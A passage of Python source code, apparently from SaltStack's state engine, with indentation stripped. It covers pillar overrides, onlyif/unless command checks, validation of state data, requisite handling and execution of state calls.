log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, six.string_types):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{0}.{1}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{0}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
Execute the aggregation systems to runtime modify the low chunk
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{0}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
        Run the onlyif and unless checks: onlyif must return 0 and unless
        must return non-zero for the state to run.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
                # If either check sets skip_watch, propagate it
                ret["skip_watch"] = _ret["skip_watch"] or ret.get("skip_watch", False)
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
        Check onlyif: a return code of 0 means the condition is true and the
        state may run; a non-zero return code means the state is skipped.
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, six.string_types):
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {0}".format(entry)
log.warning(ret["comment"])
return ret
result = self._run_check_function(entry)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
        Check unless: a return code of 0 means the condition is true and the
        state is skipped; a non-zero return code means the state may run.
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, six.string_types):
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {0}".format(entry)
log.warning(ret["comment"])
return ret
result = self._run_check_function(entry)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def reset_run_num(self):
"""
        Reset the __run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
        Read the state loader value and load up the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], six.string_types):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{0}{1}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
except RuntimeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
except TypeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
        something. If the file state function is 'managed', check whether the file
        is a possible module type, e.g. a .py, .pyx, or .so file. Always refresh if
        the function is 'recurse', since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], six.string_types):
errors.append(
"ID '{0}' {1}is not formed as a string, but is a {2}".format(
data["name"],
"in SLS '{0}' ".format(data["__sls__"])
if "__sls__" in data
else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{0}' was not found in SLS '{1}'".format(
full, data["__sls__"]
)
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {0}".format(reason))
else:
errors.append("Specified state '{0}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {0} for state {1}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
            # Check to see if the state has a mod_watch function; if it does
            # not, extend the require statement with the contents of watch so
            # that the mod_watch function is not called and the requisite
            # capability is still used
if "{0}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {0} for"
" require {1} in ID {2}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in six.iteritems(high):
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, six.string_types):
errors.append(
"ID '{0}' in SLS '{1}' is not formed as a string, but "
"is a {2}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {0} in {1} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{0}' in SLS '{1}' contains a short declaration "
"({2}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{0}' in SLS '{1}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{0}" in state '
'"{1}" in SLS "{2}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{0}' in SLS '{1}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {0} statement in state '{1}' in "
"SLS '{2}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, six.string_types):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {0}"
" in SLS {1} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{0}' "
"in state '{1}', in SLS "
"'{2}'. Requisite types must "
"not contain dots, did you "
"mean '{3}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{0}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{0}" ID "{1}" ID "{2}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{0}' in SLS '{1}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{0}' in SLS '{1}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{0}' in "
"SLS '{1}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
for state, run in six.iteritems(body):
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(
val, six.string_types
):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in six.iteritems(ext_chunk):
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in six.iteritems(body):
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, six.string_types) and isinstance(
high[name][state][hind], six.string_types
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
                                    # otherwise, it's not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, six.string_types):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
for id_, body in six.iteritems(high):
if not isinstance(body, dict):
continue
for state, run in six.iteritems(body):
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in six.iteritems(items):
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {0}: {1} for "
"{2}, in SLS '{3}'. Requisites must "
"not contain dots, did you mean '{4}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {0}: {1} for "
"{2}, in SLS '{3}'. Requisites must "
"not contain dots, did you mean '{4}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(six.iterkeys(arg)) == "name":
continue
if next(six.iterkeys(arg)) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(six.iterkeys(arg)) == "name":
continue
if next(six.iterkeys(arg)) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in six.iteritems(extend):
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {0}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
        # duration in milliseconds, with microsecond precision
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip()
if isinstance(low["name"], six.string_types)
else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{0}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip()
if isinstance(low["name"], six.string_types)
else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = six.text_type(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
if (
"unless" in low
and "{0[state]}.mod_run_check".format(low) not in self.states
) or (
"onlyif" in low
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = six.text_type(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), six.string_types):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = six.text_type(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {0}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
